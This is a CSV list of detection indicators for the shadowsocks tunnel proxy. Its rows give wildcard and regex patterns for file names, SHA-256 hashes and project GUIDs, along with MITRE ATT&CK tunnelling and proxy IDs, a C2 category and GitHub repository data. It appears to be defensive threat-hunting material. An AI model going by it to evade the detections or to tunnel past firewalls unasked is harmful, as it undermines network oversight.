"*\Shadowsocks.zip*",".{0,1000}\\Shadowsocks\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*\shadowsocks-windows.sln*",".{0,1000}\\shadowsocks\-windows\.sln.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*\ss_privoxy.log*",".{0,1000}\\ss_privoxy\.log.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*__PRIVOXY_BIND_IP__*",".{0,1000}__PRIVOXY_BIND_IP__.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*__PRIVOXY_BIND_PORT__*",".{0,1000}__PRIVOXY_BIND_PORT__.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*00833ecb01131c0c74ca39cfc0e0fe3549651df916dfc4d2c6d7aeda600784bc*",".{0,1000}00833ecb01131c0c74ca39cfc0e0fe3549651df916dfc4d2c6d7aeda600784bc.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*0472497b295c4466e58c2623f2f03281f4a8297696753dd18effe3a4d633e86e*",".{0,1000}0472497b295c4466e58c2623f2f03281f4a8297696753dd18effe3a4d633e86e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*0eaa8e2763861316fdb41ba45636dbb78c1593714a0ed480573ff7efc5b34b7a*",".{0,1000}0eaa8e2763861316fdb41ba45636dbb78c1593714a0ed480573ff7efc5b34b7a.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*13141ae2c7cfeea1ffe619f76b569d4c52204298daf5b986ffd4693534581b1e*",".{0,1000}13141ae2c7cfeea1ffe619f76b569d4c52204298daf5b986ffd4693534581b1e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*14f0840dbabc554d43cf3021e04f7b11c7285bd85ee13dfb9d59c0a942bcd515*",".{0,1000}14f0840dbabc554d43cf3021e04f7b11c7285bd85ee13dfb9d59c0a942bcd515.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*1CC6E8A9-1875-430C-B2BB-F227ACD711B1*",".{0,1000}1CC6E8A9\-1875\-430C\-B2BB\-F227ACD711B1.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*261755fa0c132c7719c4c5176bb2b5308a0176dc716fea898d3c63d60a21c521*",".{0,1000}261755fa0c132c7719c4c5176bb2b5308a0176dc716fea898d3c63d60a21c521.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*2654a13a86c8ac23149c8a173eed10965036445c50d53515d67a634b43e4ab87*",".{0,1000}2654a13a86c8ac23149c8a173eed10965036445c50d53515d67a634b43e4ab87.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*2731974930b30b2fce237f48911486b45dbd2d896d9ab3347051b0022a8bd424*",".{0,1000}2731974930b30b2fce237f48911486b45dbd2d896d9ab3347051b0022a8bd424.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*276d3ecc4dcbd180a4ee953cd9721ced7ecf1309d332b05bf3d0f02bfb73bfee*",".{0,1000}276d3ecc4dcbd180a4ee953cd9721ced7ecf1309d332b05bf3d0f02bfb73bfee.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*2cc467b53348d1cafe2d329b96a48fdb54198fca6a6e1cf41b98df353f458e6f*",".{0,1000}2cc467b53348d1cafe2d329b96a48fdb54198fca6a6e1cf41b98df353f458e6f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*3f2b33ff51dfa3351b72926fc97202f2681af4aa329b815e55100851b02b8896*",".{0,1000}3f2b33ff51dfa3351b72926fc97202f2681af4aa329b815e55100851b02b8896.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*46143050aa4cea03129c03b45faacccaa3773f2d7f300f7f031ffb83de547cbf*",".{0,1000}46143050aa4cea03129c03b45faacccaa3773f2d7f300f7f031ffb83de547cbf.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*4a302071d7fc21367f31e0d9c5f77ef1eb41ec097eaeadb8d65472b6be55ab99*",".{0,1000}4a302071d7fc21367f31e0d9c5f77ef1eb41ec097eaeadb8d65472b6be55ab99.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*4acb4274db08c54c943eef6f456c6913557163d203cbd8be63a6780e5dcf7a42*",".{0,1000}4acb4274db08c54c943eef6f456c6913557163d203cbd8be63a6780e5dcf7a42.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*4b7786288011e1255695cdae0c2199353203fd94c2c6fa57bc3be3d332344c6a*",".{0,1000}4b7786288011e1255695cdae0c2199353203fd94c2c6fa57bc3be3d332344c6a.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*4d75006597652c67dc56aa9a078eeca3a52634bf1bf591b68c926bd01ad53d25*",".{0,1000}4d75006597652c67dc56aa9a078eeca3a52634bf1bf591b68c926bd01ad53d25.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*4f932e61afb6bd1dd8b5c4c25c715f1623d3f574637d8154256531b4ef5000ac*",".{0,1000}4f932e61afb6bd1dd8b5c4c25c715f1623d3f574637d8154256531b4ef5000ac.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*5bb545bf51618a253b1ccc145bf97c8ab29d9118d6ac5e90b9bfc33bb988c3d7*",".{0,1000}5bb545bf51618a253b1ccc145bf97c8ab29d9118d6ac5e90b9bfc33bb988c3d7.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*62786ba330d6b4969906b297fbb26c3f9a9ad36672b4600938d3b607e9b3c980*",".{0,1000}62786ba330d6b4969906b297fbb26c3f9a9ad36672b4600938d3b607e9b3c980.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*62b74a688d22bfdf20f673a351580029d7b9de67c6facc9a5613b22b3f798968*",".{0,1000}62b74a688d22bfdf20f673a351580029d7b9de67c6facc9a5613b22b3f798968.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*662f875055d740d98e0047adeb2b632b85cafffa2129c1635c5312217ca978f3*",".{0,1000}662f875055d740d98e0047adeb2b632b85cafffa2129c1635c5312217ca978f3.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*69c2084081bcd8ea91474bc4292863af35bdafa0b3e3b585195bdb0e0523a419*",".{0,1000}69c2084081bcd8ea91474bc4292863af35bdafa0b3e3b585195bdb0e0523a419.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*6a842f64b5e04384ef3a1cb19797f2aa714ab44b3320f132529c60f4aafc6d75*",".{0,1000}6a842f64b5e04384ef3a1cb19797f2aa714ab44b3320f132529c60f4aafc6d75.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*6c8aefae3e5ece28c1e182ffec2c00baf2faa7ca61c426b1db6275b03524dc8d*",".{0,1000}6c8aefae3e5ece28c1e182ffec2c00baf2faa7ca61c426b1db6275b03524dc8d.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*6e2028eb0bc06325c6101c497832e66a95ce482b1771455bc7a873ef22291c65*",".{0,1000}6e2028eb0bc06325c6101c497832e66a95ce482b1771455bc7a873ef22291c65.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*7749bb3fa881d702bdcaf541f87308c438663ef32fc67c07d0c10c286f7da12f*",".{0,1000}7749bb3fa881d702bdcaf541f87308c438663ef32fc67c07d0c10c286f7da12f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*78EB3006-81B0-4C13-9B80-E91766874A57*",".{0,1000}78EB3006\-81B0\-4C13\-9B80\-E91766874A57.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*7a52b4827a4dac14ccd0c8a05a46c7debafca33672285e7630ee8f8e54387738*",".{0,1000}7a52b4827a4dac14ccd0c8a05a46c7debafca33672285e7630ee8f8e54387738.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*81257d02ae9cd6d59809ea470ce590cdeb3e7949f5a51dfacba21e1cd3d2713e*",".{0,1000}81257d02ae9cd6d59809ea470ce590cdeb3e7949f5a51dfacba21e1cd3d2713e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*83c2966fe942b2b0a1e31ea84f6336c024cb57ff5c397b0d1cddf050bb4e5b21*",".{0,1000}83c2966fe942b2b0a1e31ea84f6336c024cb57ff5c397b0d1cddf050bb4e5b21.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*8455f37f4777a237e87e3326cc9dd7af51b3bc2cfe968ff488e85effb2ca30ac*",".{0,1000}8455f37f4777a237e87e3326cc9dd7af51b3bc2cfe968ff488e85effb2ca30ac.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*87907a6d7e8d6b4cdf4264950869799096b5ebc9c3de4c9ed0204d91650ed54e*",".{0,1000}87907a6d7e8d6b4cdf4264950869799096b5ebc9c3de4c9ed0204d91650ed54e.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*8923E1ED-2594-4668-A4FA-DC2CFF7EA1CA*",".{0,1000}8923E1ED\-2594\-4668\-A4FA\-DC2CFF7EA1CA.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*8bd3acb166ddf194c57b5a38af0c9b3d1a60ab623fd04efa94434dcf5bb787c8*",".{0,1000}8bd3acb166ddf194c57b5a38af0c9b3d1a60ab623fd04efa94434dcf5bb787c8.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*913a779a64c4488167dd4d0e43427498ac2bb64b63ad6075b38c5c4af4f2e768*",".{0,1000}913a779a64c4488167dd4d0e43427498ac2bb64b63ad6075b38c5c4af4f2e768.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*94DE5045-4D09-437B-BDE3-679FCAF07A2D*",".{0,1000}94DE5045\-4D09\-437B\-BDE3\-679FCAF07A2D.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*9509da528a842ad647f557e84ec00afbaf345222bf7d6219031bf176e4bba80e*",".{0,1000}9509da528a842ad647f557e84ec00afbaf345222bf7d6219031bf176e4bba80e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*97C056B0-2AEB-4467-AAC9-E0FE0639BA9E*",".{0,1000}97C056B0\-2AEB\-4467\-AAC9\-E0FE0639BA9E.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*97c1afbdfbe31e7fed17143d9885be6588be294488cffc83661a5ef55655d3d2*",".{0,1000}97c1afbdfbe31e7fed17143d9885be6588be294488cffc83661a5ef55655d3d2.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*99142A50-E046-4F18-9C52-9855ABADA9B3*",".{0,1000}99142A50\-E046\-4F18\-9C52\-9855ABADA9B3.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*a44ba10f3e101f1118ea65ff2272e1b2da2d0ac96ceb0043bf3c9c75ad4a53a7*",".{0,1000}a44ba10f3e101f1118ea65ff2272e1b2da2d0ac96ceb0043bf3c9c75ad4a53a7.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*a5e9856fc84492bf129cca06659842ccc9705f7e24eaa9bd6ec5d529f7c61abb*",".{0,1000}a5e9856fc84492bf129cca06659842ccc9705f7e24eaa9bd6ec5d529f7c61abb.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*a9b64e47ef85ace30ca6ea6e9d79fdc665a7eb7b0a4763a659f00aa307cf7ad5*",".{0,1000}a9b64e47ef85ace30ca6ea6e9d79fdc665a7eb7b0a4763a659f00aa307cf7ad5.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*AE81B416-FBC4-4F88-9EFC-D07D8789355F*",".{0,1000}AE81B416\-FBC4\-4F88\-9EFC\-D07D8789355F.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*b4810eb33bbc3888e66d51db3c76a52abe7b98d8520584daa8d92c03e412be57*",".{0,1000}b4810eb33bbc3888e66d51db3c76a52abe7b98d8520584daa8d92c03e412be57.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*b5df12aab758bbaea8291069515a6e46b84b7b5326f24d54410fa20ac8c0c447*",".{0,1000}b5df12aab758bbaea8291069515a6e46b84b7b5326f24d54410fa20ac8c0c447.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*b6d55d6536ff5e827c393516158924d228cfc2de2d127e302537e0f4abf1f98f*",".{0,1000}b6d55d6536ff5e827c393516158924d228cfc2de2d127e302537e0f4abf1f98f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*ba5e8ac5fc350cef4640480e48932359266bff6a2a85fff3a9163dc07e5a310b*",".{0,1000}ba5e8ac5fc350cef4640480e48932359266bff6a2a85fff3a9163dc07e5a310b.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*cab2848992b779a1bdcdf76553265dc73b70046442ec9949135a515f7b65819f*",".{0,1000}cab2848992b779a1bdcdf76553265dc73b70046442ec9949135a515f7b65819f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*d19215f26a1791d5f04cd626f65108628e507be6df194fec4fe25115d74469ab*",".{0,1000}d19215f26a1791d5f04cd626f65108628e507be6df194fec4fe25115d74469ab.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z"
"*d39f61dbf2a753769c0efb7712dd7bfa6e1d1593ebaed06150f206f3b6ff7de2*",".{0,1000}d39f61dbf2a753769c0efb7712dd7bfa6e1d1593ebaed06150f206f3b6ff7de2.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*DFE11C77-62FA-4011-8398-38626C02E382*",".{0,1000}DFE11C77\-62FA\-4011\-8398\-38626C02E382.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
"*e1f6be0e39290a73ebd45a3f6254015badf0f451307ded5d96d2a3acb91e0642*",".{0,1000}e1f6be0e39290a73ebd45a3f6254015badf0f451307ded5d96d2a3acb91e0642.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z"
